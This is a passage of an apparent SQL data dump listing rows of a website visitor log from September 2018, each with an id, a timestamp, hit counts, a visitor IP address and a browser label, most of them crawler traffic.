,0,'54.36.148.140','other'),(301163,1536574871,1,1,0,0,'54.36.148.158','other'),(301164,1536574912,1,1,0,0,'54.36.149.101','other'),(301165,1536575043,1,1,0,0,'54.36.148.28','other'),(301166,1536575104,1,1,0,0,'54.36.149.99','other'),(301167,1536575245,1,1,0,0,'54.36.148.192','other'),(301168,1536575363,1,1,0,0,'54.36.149.21','other'),(301169,1536575405,1,1,0,0,'111.202.101.130','other'),(301170,1536575540,1,1,0,0,'54.36.148.32','other'),(301171,1536576153,1,1,0,0,'54.36.148.226','other'),(301172,1536576314,1,1,0,0,'54.36.149.92','other'),(301173,1536576884,1,1,0,0,'66.249.66.75','chrome'),(301174,1536577041,1,1,0,0,'54.36.148.121','other'),(301175,1536577109,1,1,0,0,'54.36.148.66','other'),(301176,1536577123,1,1,0,0,'91.196.178.174','chrome'),(301177,1536577253,1,1,0,0,'54.36.148.51','other'),(301178,1536577310,1,1,0,0,'8.29.198.27','other'),(301179,1536577346,1,1,0,0,'95.163.255.94','other'),(301180,1536577443,1,1,0,0,'40.77.167.90','other'),(301181,1536577465,1,1,0,0,'54.36.148.229','other'),(301182,1536577557,1,1,0,0,'54.36.148.177','other'),(301183,1536577627,1,1,0,0,'54.36.149.53','other'),(301184,1536577657,1,1,0,0,'54.36.148.31','other'),(301185,1536577694,1,1,0,0,'91.196.177.110','chrome'),(301186,1536577713,1,1,0,0,'54.36.148.45','other'),(301187,1536578200,1,1,0,0,'80.93.127.83','chrome'),(301188,1536578232,1,1,0,0,'216.244.66.241','other'),(301189,1536578279,1,1,0,0,'54.36.148.106','other'),(301190,1536578697,1,1,0,0,'66.102.9.136','chrome'),(301191,1536578857,1,1,0,0,'207.46.13.4','other'),(301192,1536578865,1,1,0,0,'91.196.177.35','firefox'),(301193,1536578943,1,1,0,0,'91.196.178.162','chrome'),(301194,1536578954,1,1,0,0,'54.36.149.40','other'),(301195,1536579217,1,1,0,0,'54.36.148.191','other'),(301196,1536579816,1,1,0,0,'91.196.178.81','firefox'),(301197,1536579829,1,1,0,0,'5.45.207.8','other'),(301198,1536579893,1,1,0,0,'54.36.148.15','other'),(301199,1536579983,1,1,0,0,'54.36.149.42','other'),(301200,1536580138,1,1,0,0,'193.106.30.98','firefox'),(301201,1536580379,1,1,0,0,'54.36.148.106','other'),(301202,1536580657,1,1,0,0,'54.36.149.17','other'),(301203,1536581097,1,1,0,0,'54.36.149.26','other'),(301204,1536581291,2,2,0,0,'85.114.211.241','chrome'),(301205,1536581324,1,1,0,0,'178.154.244.11','other'),(301206,1536581745,1,1,0,0,'54.36.148.182','other'),(301207,1536581751,1,1,0,0,'54.36.148.51','other'),(301208,1536582087,1,1,0,0,'54.36.148.255','other'),(301209,1536582180,1,1,0,0,'54.36.148.87','other'),(301210,1536582282,1,1,0,0,'178.93.3.53','chrome'),(301211,1536583092,1,1,0,0,'31.43.59.92','chrome'),(301212,1536583310,1,1,0,0,'31.42.161.141','msie'),(301213,1536583569,1,1,0,0,'54.36.149.80','other'),(301214,1536583834,1,1,0,0,'130.180.219.100','chrome'),(301215,1536583994,2,2,0,0,'91.196.177.46','chrome'),(301216,1536584132,1,1,0,0,'54.36.148.104','other'),(301217,1536584162,1,1,0,0,'51.255.65.46','other'),(301218,1536584517,1,1,0,0,'91.124.182.170','firefox'),(301219,1536584529,7,7,0,0,'207.46.13.208','other'),(301220,1536584737,1,1,0,0,'178.92.155.149','chrome'),(301221,1536584837,7,7,0,0,'207.46.13.4','other'),(301222,1536584840,12,12,0,0,'40.77.167.90','other'),(301223,1536584857,7,7,0,0,'40.77.167.152','other'),(301224,1536584904,1,1,0,0,'94.179.147.128','chrome'),(301225,1536585202,1,1,0,0,'54.36.148.251','other'),(301226,1536585216,1,1,0,0,'54.36.148.30','other'),(301227,1536585249,1,1,0,0,'54.36.148.160','other'),(301228,1536585298,1,1,0,0,'178.154.244.11','other'),(301229,1536585316,1,1,0,0,'54.36.148.96','other'),(301230,1536585345,1,1,0,0,'178.93.17.187','chrome'),(301231,1536585518,1,1,0,0,'54.36.148.215','other'),(301232,1536585547,1,1,0,0,'54.36.148.57','other'),(301233,1536585684,1,1,0,0,'54.36.148.225','other'),(301234,1536585920,1,1,0,0,'91.196.178.81','firefox'),(301235,1536585946,1,1,0,0,'94.179.147.128','chrome'),(301236,1536585968,1,1,0,0,'54.36.148.41','other'),(301237,1536586058,1,1,0,0,'178.154.200.48','other'),(301238,1536586085,1,1,0,0,'178.93.40.102','chrome'),(301239,1536586097,1,1,0,0,'54.36.148.162','other'),(301240,1536586126,1,1,0,0,'213.179.252.27','other'),(301241,1536586376,1,1,0,0,'54.36.149.55','other'),(301242,1536586382,1,1,0,0,'178.154.244.11','other'),(301243,1536586386,1,1,0,0,'178.154.244.29','other'),(301244,1536586518,1,1,0,0,'54.36.149.96','other'),(301245,1536586569,1,1,0,0,'54.36.148.253','other'),(301246,1536586652,1,1,0,0,'54.36.149.20','other'),(301247,1536587074,1,1,0,0,'54.36.148.203','other'),(301248,1536587090,1,1,0,0,'91.196.177.15','chrome'),(301249,1536587120,1,1,0,0,'54.36.148.198','other'),(301250,1536587550,1,1,0,0,'54.36.149.19','other'),(301251,1536587640,1,1,0,0,'54.36.148.199','other'),(301252,1536587663,1,1,0,0,'54.36.148.54','other'),(301253,1536587673,1,1,0,0,'178.92.155.149','chrome'),(301254,1536587890,1,1,0,0,'188.32.120.156','chrome'),(301255,1536587956,1,1,0,0,'54.36.149.77','other'),(301256,1536588012,1,1,0,0,'40.77.167.90','other'),(301257,1536588019,1,1,0,0,'54.36.148.12','other'),(301258,1536588066,1,1,0,0,'54.36.148.143','other'),(301259,1536588146,1,1,0,0,'8.29.198.27','other'),(301260,1536588193,1,1,0,0,'54.36.148.69','other'),(301261,1536588333,1,1,0,0,'54.36.149.65','other'),(301262,1536588363,1,1,0,0,'54.36.148.237','other'),(301263,1536588454,1,1,0,0,'178.154.244.29','other'),(301264,1536588652,1,1,0,0,'54.36.149.73','other'),(301265,1536588761,1,1,0,0,'54.36.148.196','other'),(301266,1536589263,1,1,0,0,'54.36.149.32','other'),(301267,1536589420,1,1,0,0,'54.36.148.72','other'),(301268,1536589458,1,1,0,0,'54.36.148.54','other'),(301269,1536589560,2,2,0,0,'54.36.149.102','other'),(301270,1536589707,1,1,0,0,'188.230.43.254','other'),(301271,1536589799,1,1,0,0,'54.36.148.11','other'),(301272,1536590018,1,1,0,0,'66.249.66.73','chrome'),(301273,1536590200,1,1,0,0,'54.36.148.227','other'),(301274,1536590428,1,1,0,0,'54.36.148.221','other'),(301275,1536590433,1,1,0,0,'54.36.149.89','other'),(301276,1536590454,1,1,0,0,'54.36.148.10','other'),(301277,1536590589,1,1,0,0,'54.36.148.239','other'),(301278,1536591188,1,1,0,0,'40.77.167.90','other'),(301279,1536592103,1,1,0,0,'188.230.43.254','other'),(301280,1536592188,1,1,0,0,'207.46.13.208','other'),(301281,1536592200,1,1,0,0,'54.36.148.87','other'),(301282,1536592391,1,1,0,0,'54.36.148.108','other'),(301283,1536592942,1,1,0,0,'54.36.148.217','other'),(301284,1536593061,1,1,0,0,'54.36.149.84','other'),(301285,1536593310,1,1,0,0,'54.36.148.61','other'),(301286,1536593387,1,1,0,0,'188.230.43.254','other'),(301287,1536593557,1,1,0,0,'66.249.66.74','chrome'),(301288,1536593649,1,1,0,0,'54.36.148.194','other'),(301289,1536593709,1,1,0,0,'54.36.149.65','other'),(301290,1536593713,1,1,0,0,'54.36.148.216','other'),(301291,1536593743,1,1,0,0,'54.36.148.113','other'),(301292,1536593966,1,1,0,0,'54.36.148.15','other'),(301293,1536594790,1,1,0,0,'54.36.148.205','other'),(301294,1536595212,1,1,0,0,'54.36.148.114','other'),(301295,1536595709,1,1,0,0,'188.230.43.254','other'),(301296,1536595720,1,1,0,0,'54.36.148.70','other'),(301297,1536596017,1,1,0,0,'54.36.148.204','other'),(301298,1536596136,1,1,0,0,'54.36.148.80','other'),(301299,1536596173,1,1,0,0,'54.36.148.55','other'),(301300,1536596349,1,1,0,0,'54.36.148.216','other'),(301301,1536596429,1,1,0,0,'54.36.148.156','other'),(301302,1536596710,1,1,0,0,'54.36.148.45','other'),(301303,1536596783,1,1,0,0,'54.36.148.101','other'),(301304,1536596843,1,1,0,0,'54.36.148.246','other'),(301305,1536596857,2,2,0,0,'91.196.178.60','chrome'),(301306,1536596984,1,1,0,0,'54.36.148.84','other'),(301307,1536597207,1,1,0,0,'54.36.149.1','other'),(301308,1536597516,1,1,0,0,'91.196.178.82','firefox'),(301309,1536597519,1,1,0,0,'66.249.66.73','chrome'),(301310,1536597565,1,1,0,0,'54.36.149.26','other'),(301311,1536598100,1,1,0,0,'188.230.43.254','other'),(301312,1536598499,1,1,0,0,'54.36.149.23','other'),(301313,1536598520,1,1,0,0,'54.36.148.132','other'),(301314,1536598762,1,1,0,0,'216.244.66.241','other'),(301315,1536598897,1,1,0,0,'80.252.154.233','chrome'),(301316,1536598933,1,1,0,0,'54.36.148.245','other'),(301317,1536598982,1,1,0,0,'8.29.198.27','other'),(301318,1536599030,1,1,0,0,'54.36.149.29','other'),(301319,1536599054,1,1,0,0,'5.188.210.51','firefox'),(301320,1536599182,1,1,0,0,'54.36.148.45','other'),(301321,1536599352,1,1,0,0,'95.163.255.93','other'),(301322,1536599443,1,1,0,0,'54.36.149.48','other'),(301323,1536599480,1,1,0,0,'54.36.148.52','other'),(301324,1536599491,1,1,0,0,'54.36.148.17','other'),(301325,1536599604,1,1,0,0,'54.36.148.21','other'),(301326,1536599737,1,1,0,0,'66.249.66.25','chrome'),(301327,1536599819,1,1,0,0,'54.36.149.24','other'),(301328,1536599897,1,1,0,0,'54.36.148.92','other'),(301329,1536600323,1,1,0,0,'216.244.66.241','other'),(301330,1536600708,1,1,0,0,'54.36.149.19','other'),(301331,1536600732,1,1,0,0,'54.36.148.134','other'),(301332,1536601481,1,1,0,0,'54.36.148.15','other'),(301333,1536601507,1,1,0,0,'54.36.148.137','other'),(301334,1536601516,1,1,0,0,'54.36.148.61','other'),(301335,1536601702,1,1,0,0,'54.36.148.39','other'),(301336,1536601923,1,1,0,0,'92.112.8.138','chrome'),(301337,1536602173,1,1,0,0,'66.249.66.73','chrome'),(301338,1536602253,1,1,0,0,'92.113.189.235','chrome'),(301339,1536602488,1,1,0,0,'54.36.148.72','other'),(301340,1536602563,1,1,0,0,'54.36.148.83','other'),(301341,1536602997,1,1,0,0,'54.36.149.16','other'),(301342,1536603042,1,1,0,0,'54.36.149.39','other'),(301343,1536603252,1,1,0,0,'40.77.167.90','other'),(301344,1536603469,1,1,0,0,'54.36.148.75','other'),(301345,1536604165,1,1,0,0,'54.36.149.14','other'),(301346,1536604326,2,2,0,0,'178.154.244.29','other'),(301347,1536604327,1,1,0,0,'54.36.149.8','other'),(301348,1536604452,1,1,0,0,'54.36.149.65','other'),(301349,1536604484,1,1,0,0,'54.36.149.1','other'),(301350,1536604819,1,1,0,0,'54.36.149.89','other'),(301351,1536604828,1,1,0,0,'54.36.148.180','other'),(301352,1536605511,1,1,0,0,'54.36.148.239','other'),(301353,1536605743,1,1,0,0,'54.36.149.0','other'),(301354,1536605818,1,1,0,0,'54.36.148.165','other'),(301355,1536606062,1,1,0,0,'54.36.149.34','other'),(301356,1536606389,1,1,0,0,'54.36.148.116','other'),(301357,1536606456,1,1,0,0,'54.36.148.203','other'),(301358,1536606493,1,1,0,0,'54.36.148.218','other'),(301359,1536606689,1,1,0,0,'54.36.148.215','other'),(301360,1536607097,1,1,0,0,'54.36.149.47','other'),(301361,1536607187,1,1,0,0,'54.36.148.28','other'),(301362,1536607681,1,1,0,0,'66.249.66.27','chrome'),(301363,1536607848,1,1,0,0,'66.249.66.73','chrome'),(301364,1536607881,1,1,0,0,'54.36.148.80','other'),(301365,1536608495,1,1,0,0,'178.154.244.29','other'),(301366,1536608614,1,1,0,0,'82.145.208.159','other'),(301367,1536608760,1,1,0,0,'54.36.149.9','other'),(301368,1536609168,1,1,0,0,'216.244.66.241','other'),(301369,1536609341,1,1,0,0,'54.36.148.248','other'),(301370,1536609579,1,1,0,0,'54.36.148.33','other'),(301371,1536609822,1,1,0,0,'8.29.198.26','other'),(301372,1536609826,2,2,0,0,'95.132.44.155','other'),(301373,1536609839,1,1,0,0,'54.36.148.32','other'),(301374,1536609879,1,1,0,0,'54.36.149.38','other'),(301375,1536609949,1,1,0,0,'54.36.148.11','other'),(301376,1536609986,1,1,0,0,'66.249.66.75','chrome'),(301377,1536610327,1,1,0,0,'95.163.255.95','other'),(301378,1536610356,1,0,1,0,'66.249.66.74',''),(301379,1536610857,1,1,0,0,'54.36.149.20','other'),(301380,1536610967,1,1,0,0,'54.36.148.48','other'),(301381,1536611058,1,1,0,0,'40.77.167.90','other'),(301382,1536611063,1,1,0,0,'54.36.149.10','other'),(301383,1536611449,1,1,0,0,'54.36.148.237','other'),(301384,1536611454,1,1,0,0,'54.36.149.60','other'),(301385,1536611627,1,1,0,0,'54.36.148.241','other'),(301386,1536611727,1,1,0,0,'54.36.148.66','other'),(301387,1536611782,1,1,0,0,'54.36.148.212','other'),(301388,1536612097,1,1,0,0,'54.36.148.129','other'),(301389,1536612166,1,1,0,0,'54.36.148.160','other'),(301390,1536612204,1,1,0,0,'54.36.148.134','other'),(301391,1536612683,1,1,0,0,'54.36.148.175','other'),(301392,1536612834,1,1,0,0,'54.36.149.86','other'),(301393,1536613322,1,1,0,0,'207.46.13.4','other'),(301394,1536613432,1,1,0,0,'178.154.244.11','other'),(301395,1536613620,1,1,0,0,'54.36.148.174','other'),(301396,1536613685,1,1,0,0,'54.36.148.52','other'),(301397,1536614382,1,1,0,0,'216.244.66.241','other'),(301398,1536614492,1,1,0,0,'54.36.148.201','other'),(301399,1536614831,1,1,0,0,'54.36.148.33','other'),(301400,1536615108,1,1,0,0,'54.36.148.16','other'),(301401,1536615133,1,1,0,0,'54.36.148.42','other'),(301402,1536615155,1,1,0,0,'54.36.148.111','other'),(301403,1536615290,1,1,0,0,'54.36.148.221','other'),(301404,1536615314,1,1,0,0,'91.209.11.236','other'),(301405,1536615746,1,1,0,0,'178.154.244.29','other'),(301406,1536615774,1,1,0,0,'54.36.149.33','other'),(301407,1536615850,1,1,0,0,'54.36.148.232','other'),(301408,1536615980,1,1,0,0,'54.36.148.56','other'),(301409,1536616456,1,1,0,0,'54.36.148.151','other'),(301410,1536616464,1,1,0,0,'54.36.148.157','other'),(301411,1536616778,1,1,0,0,'54.36.148.52','other'),(301412,1536616875,1,1,0,0,'54.36.148.10','other'),(301413,1536616950,1,1,0,0,'54.36.148.122','other'),(301414,1536617093,1,1,0,0,'54.36.148.66','other'),(301415,1536617234,1,1,0,0,'54.36.148.19','other'),(301416,1536617440,1,1,0,0,'54.36.148.20','other'),(301417,1536617524,1,1,0,0,'54.36.148.35','other'),(301418,1536617724,1,1,0,0,'54.36.148.83','other'),(301419,1536617800,1,1,0,0,'54.36.148.67','other'),(301420,1536617988,1,1,0,0,'54.36.148.32','other'),(301421,1536618604,1,1,0,0,'54.36.149.12','other'),(301422,1536618612,1,1,0,0,'178.154.244.11','other'),(301423,1536618713,1,1,0,0,'54.36.148.51','other'),(301424,1536618819,1,1,0,0,'54.36.148.236','other'),(301425,1536618995,1,1,0,0,'54.36.148.157','other'),(301426,1536619412,1,1,0,0,'54.36.149.29','other'),(301427,1536619620,2,2,0,0,'54.36.148.142','other'),(301428,1536620405,1,1,0,0,'66.249.66.25','chrome'),(301429,1536620487,1,1,0,0,'54.36.148.23','other'),(301430,1536620656,1,1,0,0,'8.29.198.26','other'),(301431,1536620698,1,1,0,0,'54.36.149.21','other'),(301432,1536620762,1,1,0,0,'54.36.148.215','other'),(301433,1536620829,1,1,0,0,'54.36.148.110','other'),(301434,1536620908,1,1,0,0,'54.36.148.65','other'),(301435,1536620927,1,1,0,0,'54.36.148.31','other'),(301436,1536621030,1,1,0,0,'54.36.148.236','other'),(301437,1536621040,1,1,0,0,'54.36.148.173','other'),(301438,1536621704,1,1,0,0,'66.249.66.74','chrome'),(301439,1536621968,1,1,0,0,'54.36.149.60','other'),(301440,1536622150,1,1,0,0,'80.252.153.33','firefox'),(301441,1536622284,1,1,0,0,'54.36.148.96','other'),(301442,1536622338,1,1,0,0,'54.36.148.191','other'),(301443,1536622530,1,1,0,0,'54.36.148.194','other'),(301444,1536622715,1,1,0,0,'54.36.148.213','other'),(301445,1536623230,1,1,0,0,'54.36.149.12','other'),(301446,1536624277,1,1,0,0,'54.36.149.74','other'),(301447,1536624564,1,1,0,0,'54.36.148.242','other'),(301448,1536625179,1,1,0,0,'54.36.148.53','other'),(301449,1536625195,1,1,0,0,'54.36.148.135','other'),(301450,1536625241,1,1,0,0,'54.36.148.161','other'),(301451,1536625332,1,1,0,0,'66.249.66.26','chrome'),(301452,1536625347,1,1,0,0,'54.36.148.121','other'),(301453,1536625546,1,1,0,0,'54.36.148.209','other'),(301454,1536625806,1,1,0,0,'54.36.148.151','other'),(301455,1536626040,1,0,1,0,'66.249.66.74',''),(301456,1536626544,1,1,0,0,'54.36.148.225','other'),(301457,1536627032,1,1,0,0,'54.36.148.60','other'),(301458,1536627112,1,1,0,0,'54.36.148.200','other'),(301459,1536627358,1,1,0,0,'193.106.30.98','firefox'),(301460,1536627459,1,1,0,0,'54.36.149.5','other'),(301461,1536627461,1,1,0,0,'54.36.149.102','other'),(301462,1536628090,1,1,0,0,'54.36.148.51','other'),(301463,1536628152,1,1,0,0,'54.36.148.169','other'),(301464,1536628270,1,1,0,0,'54.36.148.193','other'),(301465,1536628599,1,1,0,0,'95.108.213.50','other'),(301466,1536628638,1,1,0,0,'52.34.24.33','chrome'),(301467,1536628670,1,1,0,0,'66.249.66.75','chrome'),(301468,1536628987,1,1,0,0,'54.36.148.132','other'),(301469,1536629343,1,1,0,0,'54.36.149.84','other'),(301470,1536629364,2,2,0,0,'216.244.66.241','other'),(301471,1536629448,1,0,1,0,'66.249.66.73',''),(301472,1536629644,1,1,0,0,'178.154.171.60','other'),(301473,1536629816,1,1,0,0,'54.36.148.79','other'),(301474,1536629834,1,1,0,0,'54.36.148.224','other'),(301475,1536629968,1,1,0,0,'54.36.148.181','other'),(301476,1536630488,1,1,0,0,'54.36.148.87','other'),(301477,1536630775,1,1,0,0,'54.36.148.151','other'),(301478,1536630871,1,1,0,0,'54.36.148.117','other'),(301479,1536631066,1,1,0,0,'54.36.148.70','other'),(301480,1536631093,1,1,0,0,'54.36.148.182','other'),(301481,1536631232,1,1,0,0,'54.36.149.50','other'),(301482,1536631402,1,1,0,0,'52.37.211.217','chrome'),(301483,1536631485,1,1,0,0,'8.29.198.25','other'),(301484,1536631599,1,1,0,0,'54.36.148.88','other'),(301485,1536632116,1,1,0,0,'54.36.148.209','other'),(301486,1536632478,1,1,0,0,'54.36.148.180','other'),(301487,1536632982,1,1,0,0,'54.36.148.11','other'),(301488,1536633152,1,1,0,0,'54.36.149.55','other'),(301489,1536633227,1,1,0,0,'66.249.66.73','chrome'),(301490,1536633358,1,1,0,0,'178.154.244.29','other'),(301491,1536633359,1,1,0,0,'94.178.7.37','chrome'),(301492,1536634309,1,1,0,0,'54.36.148.37','other'),(301493,1536634482,1,1,0,0,'54.36.149.16','other'),(301494,1536634661,1,1,0,0,'54.36.148.30','other'),(301495,1536634775,1,1,0,0,'54.36.148.61','other'),(301496,1536635113,1,1,0,0,'54.36.149.62','other'),(301497,1536635238,1,1,0,0,'54.36.148.72','other'),(301498,1536635298,1,1,0,0,'54.36.148.96','other'),(301499,1536635416,1,1,0,0,'54.36.148.250','other'),(301500,1536636289,1,1,0,0,'54.36.149.64','other'),(301501,1536636530,1,1,0,0,'54.36.149.79','other'),(301502,1536636867,2,2,0,0,'216.244.66.241','other'),(301503,1536637399,1,1,0,0,'54.36.148.34','other'),(301504,1536637475,1,1,0,0,'54.36.148.240','other'),(301505,1536637510,1,1,0,0,'66.249.66.75','chrome'),(301506,1536637602,1,1,0,0,'54.36.149.100','other'),(301507,1536637753,1,1,0,0,'54.36.148.193','other'),(301508,1536637928,1,1,0,0,'54.36.148.215','other'),(301509,1536638211,1,1,0,0,'54.36.148.46','other'),(301510,1536638217,1,1,0,0,'66.249.66.74','chrome'),(301511,1536638645,1,1,0,0,'54.36.148.147','other'),(301512,1536638663,1,1,0,0,'54.36.148.42','other'),(301513,1536638747,1,1,0,0,'54.36.148.172','other'),(301514,1536638781,1,1,0,0,'54.36.149.86','other'),(301515,1536638890,1,1,0,0,'54.36.149.45','other'),(301516,1536638967,1,1,0,0,'66.249.66.73','chrome'),(301517,1536639147,1,1,0,0,'54.36.149.6','other'),(301518,1536639449,1,1,0,0,'178.154.244.11','other'),(301519,1536639453,1,1,0,0,'178.154.244.29','other'),(301520,1536639497,1,1,0,0,'54.36.148.148','other'),(301521,1536639507,1,1,0,0,'66.249.66.75','chrome'),(301522,1536640524,1,1,0,0,'54.36.148.122','other'),(301523,1536640542,1,1,0,0,'54.36.148.72','other'),(301524,1536640680,1,1,0,0,'54.36.149.106','other'),(301525,1536641088,1,1,0,0,'54.36.148.161','other'),(301526,1536641351,1,1,0,0,'54.36.148.228','other'),(301527,1536641900,1,1,0,0,'54.36.148.48','other'),(301528,1536642010,1,1,0,0,'54.36.148.198','other'),(301529,1536642020,1,1,0,0,'54.36.148.191','other'),(301530,1536642134,1,1,0,0,'91.196.178.178','chrome'),(301531,1536642316,1,1,0,0,'8.29.198.25','other'),(301532,1536642369,1,1,0,0,'178.154.244.29','other'),(301533,1536642423,1,1,0,0,'54.36.149.19','other'),(301534,1536642578,1,1,0,0,'54.36.148.69','other'),(301535,1536642617,1,1,0,0,'54.36.148.241','other'),(301536,1536642825,1,1,0,0,'54.36.149.84','other'),(301537,1536642888,1,1,0,0,'54.36.148.185','other'),(301538,1536642979,1,1,0,0,'77.37.164.37','msie'),(301539,1536643551,1,1,0,0,'54.36.148.241','other'),(301540,1536643591,1,1,0,0,'54.36.148.124','other'),(301541,1536643651,1,1,0,0,'54.36.148.93','other'),(301542,1536643707,1,1,0,0,'66.249.66.73','chrome'),(301543,1536643946,1,1,0,0,'54.36.148.171','other'),(301544,1536644159,1,1,0,0,'66.249.66.75','chrome'),(301545,1536644232,1,1,0,0,'54.36.148.167','other'),(301546,1536644385,3,3,0,0,'216.244.66.241','other'),(301547,1536644529,1,1,0,0,'54.36.148.215','other'),(301548,1536644867,1,1,0,0,'178.93.62.164','chrome'),(301549,1536644902,1,1,0,0,'54.36.148.58','other'),(301550,1536645128,1,1,0,0,'95.132.27.160','chrome'),(301551,1536645245,1,1,0,0,'54.36.148.59','other'),(301552,1536645335,1,1,0,0,'54.36.149.4','other'),(301553,1536645881,1,1,0,0,'134.249.147.14','chrome'),(301554,1536646006,1,1,0,0,'54.36.148.163','other'),(301555,1536646160,1,1,0,0,'54.36.148.24','other'),(301556,1536646235,1,1,0,0,'91.196.178.133','chrome'),(301557,1536646477,1,1,0,0,'40.77.167.90','other'),(301558,1536646573,1,1,0,0,'54.36.148.253','other'),(301559,1536646629,1,1,0,0,'54.36.148.87','other'),(301560,1536646833,1,1,0,0,'54.36.148.220','other'),(301561,1536646876,1,1,0,0,'54.36.148.121','other'),(301562,1536647024,2,2,0,0,'216.244.66.241','other'),(301563,1536647427,1,1,0,0,'54.36.148.106','other'),(301564,1536647641,1,1,0,0,'54.36.148.77','other'),(301565,1536647765,1,1,0,0,'54.36.149.28','other'),(301566,1536647812,1,1,0,0,'178.154.244.29','other'),(301567,1536647953,1,1,0,0,'66.249.66.73','chrome'),(301568,1536648038,1,1,0,0,'54.36.148.233','other'),(301569,1536648250,1,1,0,0,'54.36.149.86','other'),(301570,1536648290,1,0,1,0,'66.249.66.27',''),(301571,1536648339,1,1,0,0,'54.36.148.214','other'),(301572,1536648423,1,1,0,0,'66.249.66.26','chrome'),(301573,1536648433,1,1,0,0,'54.36.148.61','other'),(301574,1536648527,1,1,0,0,'54.36.148.16','other'),(301575,1536648906,1,1,0,0,'91.196.178.136','chrome'),(301576,1536649480,2,2,0,0,'91.196.178.134','chrome'),(301577,1536649505,1,1,0,0,'216.244.66.241','other'),(301578,1536649527,1,1,0,0,'54.36.149.24','other'),(301579,1536649595,1,1,0,0,'54.36.148.21','other'),(301580,1536649702,1,1,0,0,'54.36.149.85','other'),(301581,1536649704,2,2,0,0,'91.196.178.104','chrome'),(301582,1536649926,1,1,0,0,'95.163.255.108','other'),(301583,1536649938,1,1,0,0,'95.163.255.112','other'),(301584,1536649942,1,1,0,0,'95.163.255.118','other'),(301585,1536650136,1,1,0,0,'82.207.113.118','chrome'),(301586,1536650153,1,1,0,0,'54.36.148.64','other'),(301587,1536650195,1,0,1,0,'66.249.66.73',''),(301588,1536650363,1,1,0,0,'66.249.66.73','chrome'),(301589,1536650483,1,1,0,0,'216.244.66.241','other'),(301590,1536650578,1,1,0,0,'91.196.178.136','firefox'),(301591,1536650669,1,1,0,0,'54.36.148.98','other'),(301592,1536650778,1,1,0,0,'54.36.148.130','other'),(301593,1536650849,1,1,0,0,'178.154.244.11','other'),(301594,1536650853,1,1,0,0,'54.36.149.69','other'),(301595,1536651058,1,1,0,0,'54.165.59.7','other'),(301596,1536651179,1,1,0,0,'54.36.148.155','other'),(301597,1536651262,1,1,0,0,'54.36.148.121','other'),(301598,1536651320,1,1,0,0,'51.255.65.46','other'),(301599,1536651563,1,1,0,0,'54.36.149.17','other'),(301600,1536651717,1,1,0,0,'91.196.178.70','firefox'),(301601,1536651758,1,1,0,0,'66.249.66.75','chrome'),(301602,1536651929,1,1,0,0,'54.36.148.201','other'),(301603,1536652146,1,1,0,0,'54.36.148.210','other'),(301604,1536652400,1,1,0,0,'54.36.149.5','other'),(301605,1536652468,1,1,0,0,'46.175.64.59','chrome'),(301606,1536652557,1,1,0,0,'216.244.66.241','other'),(301607,1536652724,1,1,0,0,'178.154.244.29','other'),(301608,1536652859,1,1,0,0,'54.36.148.208','other'),(301609,1536653081,1,1,0,0,'54.36.148.98','other'),(301610,1536653150,1,1,0,0,'8.29.198.25','other'),(301611,1536653251,2,2,0,0,'54.165.59.7','other'),(301612,1536653303,1,1,0,0,'146.185.157.19','chrome'),(301613,1536653339,1,1,0,0,'54.36.148.121','other'),(301614,1536653613,1,1,0,0,'54.36.148.82','other'),(301615,1536653761,1,1,0,0,'54.36.148.94','other'),(301616,1536653814,1,1,0,0,'54.36.148.86','other'),(301617,1536653894,1,1,0,0,'178.154.244.11','other'),(301618,1536653965,1,1,0,0,'54.36.148.48','other'),(301619,1536654022,1,1,0,0,'54.36.148.213','other'),(301620,1536654181,1,1,0,0,'91.196.178.136','chrome'),(301621,1536654308,1,1,0,0,'54.36.148.65','other'),(301622,1536654487,1,1,0,0,'54.36.148.79','other'),(301623,1536654698,1,1,0,0,'91.196.178.79','chrome'),(301624,1536654883,1,1,0,0,'54.36.148.56','other'),(301625,1536654979,1,1,0,0,'54.36.149.106','other'),(301626,1536655039,1,1,0,0,'54.36.148.131','other'),(301627,1536655172,1,1,0,0,'54.36.149.46','other'),(301628,1536655194,1,1,0,0,'37.73.212.243','other'),(301629,1536655553,1,1,0,0,'54.36.148.239','other'),(301630,1536655566,1,1,0,0,'54.36.149.29','other'),(301631,1536655605,1,1,0,0,'54.36.149.14','other'),(301632,1536655710,1,1,0,0,'54.36.148.76','other'),(301633,1536655724,1,1,0,0,'46.211.113.40','chrome'),(301634,1536655736,1,1,0,0,'216.244.66.241','other'),(301635,1536655851,1,1,0,0,'54.36.148.182','other'),(301636,1536655881,1,1,0,0,'54.36.148.21','other'),(301637,1536655887,1,1,0,0,'54.36.149.2','other'),(301638,1536656115,1,1,0,0,'54.36.148.151','other'),(301639,1536656244,1,1,0,0,'178.154.244.11','other'),(301640,1536656416,1,1,0,0,'54.36.148.150','other'),(301641,1536656519,1,1,0,0,'54.36.148.50','other'),(301642,1536656543,1,1,0,0,'54.36.148.25','other'),(301643,1536656566,1,1,0,0,'54.36.149.1','other'),(301644,1536656587,1,1,0,0,'54.36.148.17','other'),(301645,1536656604,1,1,0,0,'54.36.149.43','other'),(301646,1536656616,1,1,0,0,'54.36.148.71','other'),(301647,1536656653,1,1,0,0,'54.36.149.51','other'),(301648,1536656709,1,1,0,0,'54.36.149.42','other'),(301649,1536657019,1,1,0,0,'91.196.178.136','chrome'),(301650,1536657086,1,1,0,0,'178.154.244.29','other'),(301651,1536657255,1,1,0,0,'54.36.148.205','other'),(301652,1536657335,1,1,0,0,'54.36.149.8','other'),(301653,1536657353,2,0,2,0,'66.249.66.73',''),(301654,1536657359,1,1,0,0,'54.36.148.157','other'),(301655,1536657503,1,1,0,0,'54.36.148.162','other'),(301656,1536657630,1,1,0,0,'54.36.148.100','other'),(301657,1536657650,1,1,0,0,'54.36.148.229','other'),(301658,1536657683,1,1,0,0,'216.244.66.241','other'),(301659,1536657871,1,1,0,0,'54.36.149.37','other'),(301660,1536657961,2,2,0,0,'54.165.59.7','other'),(301661,1536658091,1,1,0,0,'54.36.149.100','other'),(301662,1536658731,1,1,0,0,'54.36.148.31','other'),(301663,1536658791,1,1,0,0,'54.36.148.48','other'),(301664,1536659174,1,1,0,0,'66.249.66.26','chrome'),(301665,1536659369,1,0,1,0,'66.249.66.75',''),(301666,1536659570,1,1,0,0,'91.196.177.134','chrome'),(301667,1536659659,1,1,0,0,'54.36.149.33','other'),(301668,1536659685,1,1,0,0,'8.29.198.45','other'),(301669,1536659687,1,1,0,0,'8.29.198.40','other'),(301670,1536659689,1,1,0,0,'8.29.198.37','other'),(301671,1536659690,1,1,0,0,'8.29.198.44','other'),(301672,1536659734,1,1,0,0,'35.187.132.38','chrome'),(301674,1536659744,1,1,0,0,'178.154.244.29','other'),(301675,1536659760,1,1,0,